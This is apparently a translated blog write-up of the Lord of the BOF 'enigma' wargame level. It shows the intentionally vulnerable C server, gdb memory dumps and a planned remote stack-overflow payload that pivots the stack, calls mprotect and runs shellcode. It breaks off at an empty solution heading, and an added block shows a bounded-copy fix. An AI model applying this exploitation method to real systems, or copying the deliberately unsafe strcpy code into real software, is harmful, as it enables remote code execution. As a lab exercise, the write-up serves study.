[ Fedora Core 4 ] cruel -> enigma

dool2ly 2015. 9. 6. 19:15

/*
        The Lord of the BOF : The Fellowship of the BOF

        - enigma
        - Remote BOF on Fedora Core 4
        - hint : ?
        - port : TCP 7777
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int vuln(int canary,char *ptr)
{
        char buffer[256];
        int *ret;

        // stack overflow!!
        strcpy(buffer,ptr);

        // overflow protected
        if(canary != 0x31337)
        {
                printf("who broke my canary?!");
                exit(1);
        }

        // preventing RTL
        ret = &canary - 1;
        if((*ret & 0xff000000) == 0)
        {
                printf("I've an allergy to NULL");
                exit(1);
        }

        // clearing attack buffer
        memset(ptr, 0, 1024);

        return 0;
}

int main()
{
        char buffer[1024];

        printf("enigma : The brothers will be glad to have you!\n");
        printf("you : ");
        fflush(stdout);

        // give me a food!
        fgets(buffer, 1024, stdin);

        // oops~!
        vuln(0x31337, buffer);

        // bye bye
        exit(0);
}


Served on port 7777 by a super daemon -> you only need to spawn a shell.


As in the [Fedora Core 3] dark_eyes -> hell+fire problem (http://dool2ly.tistory.com/32),

build a custom stack in stdin, move ebp onto the custom stack via leave-ret,

then give the custom stack execute permission with mprotect and run the shellcode.
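Added here as an example, not part of the original post or the LOB binary: the bounded copy that closes the strcpy() overflow in vuln(). Unlike the constant 0x31337 check, which only notices an overwrite that changes the value, refusing oversized input prevents the overwrite itself. The function and status names (safe_vuln, try_input, copy_status) are assumptions for illustration; the sizes match the 256-byte local buffer and the 1024-byte fgets() buffer in the source above.

```c
#include <stdio.h>
#include <string.h>

#define LOCAL_BUF 256   /* same as buffer[256] in the original vuln() */
#define INPUT_BUF 1024  /* same as buffer[1024] in the original main() */

/* Result of the bounded copy; the caller can log and drop bad requests. */
enum copy_status { COPY_OK = 0, COPY_TOO_LONG = 1, COPY_NULL = 2 };

/* safe_vuln (assumed name): copies ptr into a LOCAL_BUF-sized stack buffer
 * only when it fits, terminator included. Nothing is written past buffer,
 * so the saved ebp, the return address and the canary argument stay intact. */
enum copy_status safe_vuln(const char *ptr)
{
    char buffer[LOCAL_BUF];
    const char *nul;

    if (ptr == NULL)
        return COPY_NULL;
    /* Search for the terminator only inside the INPUT_BUF-sized source, so
     * an unterminated input cannot make the scan run off the end either. */
    nul = memchr(ptr, '\0', INPUT_BUF);
    if (nul == NULL || (size_t)(nul - ptr) >= LOCAL_BUF)
        return COPY_TOO_LONG;          /* would overflow: refuse, do not copy */

    memcpy(buffer, ptr, (size_t)(nul - ptr) + 1);  /* bounded copy, NUL included */
    /* ... real processing of buffer would go here ... */
    return COPY_OK;
}

/* try_input (assumed name): constructs n 'D' bytes, like the "DDDD" probe in
 * the gdb session below, and feeds them to safe_vuln(). */
enum copy_status try_input(size_t n)
{
    char input[INPUT_BUF];

    if (n >= INPUT_BUF)
        n = INPUT_BUF - 1;             /* fgets(buffer, 1024, ...) never yields more */
    memset(input, 'D', n);
    input[n] = '\0';
    return safe_vuln(input);
}

int main(void)
{
    printf("4 bytes: %d, 255 bytes: %d, 260 bytes: %d\n",
           try_input(4), try_input(255), try_input(260));
    return 0;
}
```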




(gdb) b *vuln+142
Breakpoint 1 at 0x804858e
(gdb) r
Starting program: /home/cruel/enigma
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x768000
(no debugging symbols found)
(no debugging symbols found)
enigma : The brothers will be glad to have you!
you : DDDD

Breakpoint 1, 0x0804858e in vuln ()
(gdb) x/24 $esp
0xbf8b2590:     0x00000000      0x55e9b0a6      0x38c5dbe8      0x55e9b0a6
0xbf8b25a0:     0x39e7bb60      0x44444444      0x15dd000a      0x00000002
0xbf8b25b0:     0x00000000      0x008caff4      0x008cb740      0x008cb5e0
0xbf8b25c0:     0xbf8b25e0      0x00804da0      0x00861493      0x008caff4
0xbf8b25d0:     0x0080574f      0x00000000      0xb7fb1000      0x00000400
0xbf8b25e0:     0xbf8b2600      0x0080459d      0x008cb740      0xb7fb1000
(gdb) x $ebp
0xbf8b26a8:     0xbf8b2ad8


0xbf8b26a8 - 0xbf8b25a4 = 0x104 (260), so the buffer size is 260 bytes, and




(gdb) x/4wx *0x0804985c
0x8cb740 <_IO_2_1_stdin_>:      0xfbad2288      0xb7ff3005      0xb7ff3005      0xb7ff3000
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in wrong format

Starting program: /home/cruel/enigma
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x3c6000
(no debugging symbols found)
(no debugging symbols found)
enigma : The brothers will be glad to have you!
you : DDDD

Breakpoint 1, 0x0804858e in vuln ()
(gdb) x/4wx *0x0804985c
0x8cb740 <_IO_2_1_stdin_>:      0xfbad2288      0xb7f05005      0xb7f05005      0xb7f05000


The address of stdin keeps changing, in the form 0xb7f--000.


So the payload is laid out as below..

dummy(260) | 0xb7f--10c | leave-ret | 0x31337 | mprotect | 0xb7f--12c | 0xb7f--000 | 0x800 | 0x07 | shell code


The location of stdin can be resolved by brute-forcing ....


-- Solution --


